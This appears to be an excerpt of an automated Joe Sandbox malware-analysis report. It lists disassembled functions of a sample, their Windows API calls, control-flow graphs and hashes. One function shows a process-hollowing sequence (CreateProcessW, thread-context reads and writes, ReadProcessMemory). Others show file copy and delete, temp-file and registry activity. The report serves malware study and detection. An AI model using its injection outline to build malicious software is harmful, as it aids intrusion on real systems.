                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BE1C90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: TDJ7APUKN2M80O6O
                                                                    • API String ID: 2694422964-1287426209
                                                                    • Opcode ID: 32a7b62362b34236eac4e9162016ea36e6b0590fd14612d413ea53ddb0a7d0d9
                                                                    • Instruction ID: 14c4b03924bbf3f21e08c9fca2adb49463d9051d59dac05d05fa110cf777c9db
                                                                    • Opcode Fuzzy Hash: 32a7b62362b34236eac4e9162016ea36e6b0590fd14612d413ea53ddb0a7d0d9
                                                                    • Instruction Fuzzy Hash: D4519230D04289EBEF11DBE8C854BEEBBB9AF14300F104599E208BB2C0D7B90B45CB65
                                                                    Function 00952947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952C05
                                                                    • DeleteFileW.KERNEL32(?), ref: 00952C87
                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00952C9D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CAE
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00952CC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$Copy
                                                                    • String ID:
                                                                    • API String ID: 3226157194-0
                                                                    • Opcode ID: 1ba340b528fb467fe2dd5faf346200962dd815d143ffd18325647f746b167310
                                                                    • Instruction ID: 11fa29512b5a71827cbe75e0c81b81bdb8efc98ff3712735c2a8ec96b6bd473e
                                                                    • Opcode Fuzzy Hash: 1ba340b528fb467fe2dd5faf346200962dd815d143ffd18325647f746b167310
                                                                    • Instruction Fuzzy Hash: D6B14E72D00119ABDF15DBA5CC85EDEB7BDEF4A354F1040A6FA09E6141EB309A488FA1
                                                                    Function 008E3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 844 8e3b1c-8e3b27 845 8e3b99-8e3b9b 844->845 846 8e3b29-8e3b2e 844->846 847 8e3b8c-8e3b8f 845->847 846->845 848 8e3b30-8e3b48 RegOpenKeyExW 846->848 848->845 849 8e3b4a-8e3b69 RegQueryValueExW 848->849 850 8e3b6b-8e3b76 849->850 851 8e3b80-8e3b8b RegCloseKey 849->851 852 8e3b78-8e3b7a 850->852 853 8e3b90-8e3b97 850->853 851->847 854 8e3b7e 852->854 853->854 854->851
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B40
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B61
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B83
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
                                                                    • Instruction ID: 138c870f523182f876e39726db9546ee4798ffce5e6e5abaad04edc34de04b8b
                                                                    • Opcode Fuzzy Hash: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
                                                                    • Instruction Fuzzy Hash: 7A112AB5620248FFDB208FA6DC48AAEB7B8FF86754B104559E806D7110D2319E40A7A0
                                                                    Function 00BE0A68 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 855 be0a68-be0b08 call be2ed8 * 3 862 be0b1f 855->862 863 be0b0a-be0b14 855->863 865 be0b26-be0b2f 862->865 863->862 864 be0b16-be0b1d 863->864 864->865 866 be0b36-be11e8 865->866 867 be11ea-be11ee 866->867 868 be11fb-be1228 CreateProcessW 866->868 869 be1234-be1261 867->869 870 be11f0-be11f4 867->870 876 be122a-be122d 868->876 877 be1232 868->877 890 be126b 869->890 891 be1263-be1266 869->891 871 be126d-be129a 870->871 872 be11f6 870->872 875 be12a4-be12be Wow64GetThreadContext 871->875 897 be129c-be129f 871->897 872->875 880 be12c5-be12e0 ReadProcessMemory 875->880 881 be12c0 875->881 878 be1629-be162b 876->878 877->875 883 be12e7-be12f0 880->883 884 be12e2 880->884 882 be15d2-be15d6 881->882 888 be15d8-be15dc 882->888 889 be1627 882->889 886 be1319-be1338 call be2558 883->886 887 be12f2-be1301 883->887 884->882 904 be133f-be1362 call be2698 886->904 905 be133a 886->905 887->886 893 be1303-be1312 call be24a8 887->893 894 be15de-be15ea 888->894 895 be15f1-be15f5 888->895 889->878 890->875 891->878 893->886 910 be1314 893->910 894->895 900 be15f7-be15fa 895->900 901 be1601-be1605 895->901 897->878 900->901 906 be1607-be160a 901->906 907 be1611-be1615 901->907 914 be13ac-be13cd call be2698 904->914 915 be1364-be136b 904->915 905->882 906->907 908 be1617-be161d call be24a8 907->908 909 be1622-be1625 907->909 908->909 909->878 910->882 922 be13cf 914->922 923 be13d4-be13f2 call be2ef8 914->923 916 be136d-be139e call be2698 915->916 917 be13a7 915->917 924 be13a5 916->924 925 be13a0 916->925 917->882 922->882 928 be13fd-be1407 923->928 924->914 925->882 929 be143d-be1441 928->929 930 be1409-be143b call be2ef8 928->930 932 be152c-be1549 call be20a8 929->932 933 be1447-be1457 929->933 930->928 940 be154b 932->940 941 be1550-be156f Wow64SetThreadContext 932->941 933->932 935 be145d-be146d 933->935 935->932 939 be1473-be1497 935->939 942 be149a-be149e 939->942 940->882 943 be1573-be157e call be23d8 941->943 944 be1571 941->944 942->932 945 be14a4-be14b9 942->945 951 be1582-be1586 943->951 952 be1580 943->952 944->882 947 be14cd-be14d1 945->947 949 be150f-be1527 947->949 950 be14d3-be14df 947->950 949->942 953 be150d 950->953 954 be14e1-be150b 950->954 955 be1588-be158b 951->955 956 be1592-be1596 951->956 952->882 953->947 954->953 955->956 958 be1598-be159b 956->958 959 be15a2-be15a6 956->959 958->959 960 be15a8-be15ab 959->960 961 be15b2-be15b6 959->961 960->961 962 be15b8-be15be call be24a8 961->962 963 be15c3-be15cc 961->963 962->963 963->866 963->882
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00BE1223
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BE12B9
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BE12DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                    • Instruction ID: 6188dc125954a203ca362241d303836e61b4cf74bb4e990651bed009f4737a1e
                                                                    • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                    • Instruction Fuzzy Hash: 8762FA30A14258DBEB24CFA5C851BDEB3B6EF58300F2095A9D10DEB390E7759E81CB59
                                                                    Function 008EDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 009332B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 56edcf0b6036356a33ff2563a2ce5f86573fa3f0576c26e65fffd59e25d64aa2
                                                                    • Instruction ID: a371b0c4d6928c44be04b45427e4c1761d266b45c219eeda48fbbe8831d1e0c8
                                                                    • Opcode Fuzzy Hash: 56edcf0b6036356a33ff2563a2ce5f86573fa3f0576c26e65fffd59e25d64aa2
                                                                    • Instruction Fuzzy Hash: ABC29B71A00259DFCB24CF69C880AADB7B1FF1A314F248169E956EB3A1D371ED41CB91
                                                                    Function 008E3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009233A2
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E3A04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                    • String ID: Line:
                                                                    • API String ID: 2289894680-1585850449
                                                                    • Opcode ID: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
                                                                    • Instruction ID: c94a7681c2cb88397a578abab713ff785233dcfd0ecb6ca9e84a94173f2233f1
                                                                    • Opcode Fuzzy Hash: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
                                                                    • Instruction Fuzzy Hash: 8831C271418394AAC325EB25DC49BEBB7D8FF82724F50462AF599C3191EB709A48C7C3
                                                                    Function 008FFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00900668
                                                                      • Part of subcall function 009032A4: RaiseException.KERNEL32(?,?,?,0090068A,?,009B1444,?,?,?,?,?,?,0090068A,008E1129,009A8738,008E1129), ref: 00903304
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00900685
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: a914872bbab0cbcef06ed4b9bc053d8f38c268dcc6df112231f76efc92e68747
                                                                    • Instruction ID: c74cdf7927a7ced5e64b6f540f8db469b57a3ca93674f4357a24629098ce21c1
                                                                    • Opcode Fuzzy Hash: a914872bbab0cbcef06ed4b9bc053d8f38c268dcc6df112231f76efc92e68747
                                                                    • Instruction Fuzzy Hash: 60F0442490020D6FCB10B675DC46F5E776DAEC0354F604531BA24D65D2EF71DA6589C0
                                                                    Function 00953017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0095302F
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00953044
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
                                                                    • Instruction ID: 47da988782df8b08e7e327ec00b4eba3b063bf2778b7a173e279acf8fce7626a
                                                                    • Opcode Fuzzy Hash: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
                                                                    • Instruction Fuzzy Hash: 2CD05EB350032877DB20A7A4AC0EFCB3A6CDB05750F4002A1B669E2096DAB0DA84CBD0
                                                                    Function 00967F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009682F5
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 009682FC
                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 009684DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                    • String ID:
                                                                    • API String ID: 146820519-0
                                                                    • Opcode ID: 25966c1b0c18e2d45c17ff5e2a4930119b002eed2bf298dffd498123b2e0fb4b
                                                                    • Instruction ID: acc18e9b5cd1b756d837c93b2a4a688a069687164545a219deec215159c77a35
                                                                    • Opcode Fuzzy Hash: 25966c1b0c18e2d45c17ff5e2a4930119b002eed2bf298dffd498123b2e0fb4b
                                                                    • Instruction Fuzzy Hash: 37126B71A083419FC714DF28C484B6ABBE5FF89318F048A5DE8998B352DB71ED45CB92
                                                                    Function 00915AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 821471b922f5ae36ba3d42c97d9aeff1e306e536d29eeb81bf0049080e723cd6
                                                                    • Instruction ID: aa85da204a3a84f36b6be8dab518bf68bb2f5e17be24a863ef18be3d50255396
                                                                    • Opcode Fuzzy Hash: 821471b922f5ae36ba3d42c97d9aeff1e306e536d29eeb81bf0049080e723cd6
                                                                    • Instruction Fuzzy Hash: F151CD71F0460DDFCB20AFA8C945BEEBBB8AFC5310F17005AF405A7291D7759A819BA1
                                                                    Function 008E10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22
                                                                      • Part of subcall function 008E1B4A: RegisterWindowMessageW.USER32(00000004,?,008E12C4), ref: 008E1BA2
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008E136A
                                                                    • OleInitialize.OLE32 ref: 008E1388
                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 009224AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    • Opcode ID: 18a7a7f7f96cbf457ce990c82ed8011996a5742e37a023310bd357747da085f8
                                                                    • Instruction ID: 2e12c046835f2eb05047788c8257edba38602bc180b62c3ce7e4e0a3700defc5
                                                                    • Opcode Fuzzy Hash: 18a7a7f7f96cbf457ce990c82ed8011996a5742e37a023310bd357747da085f8
                                                                    • Instruction Fuzzy Hash: B271C2B59293408FC7A4DF7AAA656953BE1FB893603D4832EE01AC7271EBB04440EF51
                                                                    Function 0094C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E3A04
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0094C259
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0094C261
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0094C270
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                    • String ID:
                                                                    • API String ID: 3500052701-0
                                                                    • Opcode ID: 6d4ce1d856cf6e7f2ba8c611458a07ee847fca5b984327f686cd11858ee814d1
                                                                    • Instruction ID: fd6c58f7deb594fae112194a51226e40f3b0cd46aac08d9d82bdf674cbf2447a
                                                                    • Opcode Fuzzy Hash: 6d4ce1d856cf6e7f2ba8c611458a07ee847fca5b984327f686cd11858ee814d1
                                                                    • Instruction Fuzzy Hash: B731A9B19053446FEB769F748855BD7BBECAF06308F00049DD6EDA7241C7B46A84CB51
                                                                    Function 009186AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,009185CC,?,009A8CC8,0000000C), ref: 00918704
                                                                    • GetLastError.KERNEL32(?,009185CC,?,009A8CC8,0000000C), ref: 0091870E
                                                                    • __dosmaperr.LIBCMT ref: 00918739
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2583163307-0
                                                                    • Opcode ID: d6e94fe3be6e3d8f8bad6b367dc2933c3930e50cf701ab8474e663960e15e94b
                                                                    • Instruction ID: a2d63d2faafd98d406fd72768246b3ff325e2f441b0e632ccbd508e0f8a5f17e
                                                                    • Opcode Fuzzy Hash: d6e94fe3be6e3d8f8bad6b367dc2933c3930e50cf701ab8474e663960e15e94b
                                                                    • Instruction Fuzzy Hash: 67014E3370562896D665633469497FF6B4D4BC17B4F3A021EF8389B1D2DEA1CCC2A150
                                                                    Function 008EDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • TranslateMessage.USER32(?), ref: 008EDB7B
                                                                    • DispatchMessageW.USER32(?), ref: 008EDB89
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB9F
                                                                    • Sleep.KERNEL32(0000000A), ref: 008EDBB1
                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00931CC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                    • String ID:
                                                                    • API String ID: 3288985973-0
                                                                    • Opcode ID: 08982b49b9d5c242dfd8a102889cc5a7455f94c6edbb51fb0da056383d3c5024
                                                                    • Instruction ID: bc5560b33718cdd635eed1e9259d6cc756c8f5db00dd68ed69768aa0de13c3b9
                                                                    • Opcode Fuzzy Hash: 08982b49b9d5c242dfd8a102889cc5a7455f94c6edbb51fb0da056383d3c5024
                                                                    • Instruction Fuzzy Hash: B6F054715183849BE734C765DC55FEA73ACFB85310F504519E649C30D0EB3094889B15
                                                                    Function 00952FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00952CD4,?,?,?,00000004,00000001), ref: 00952FF2
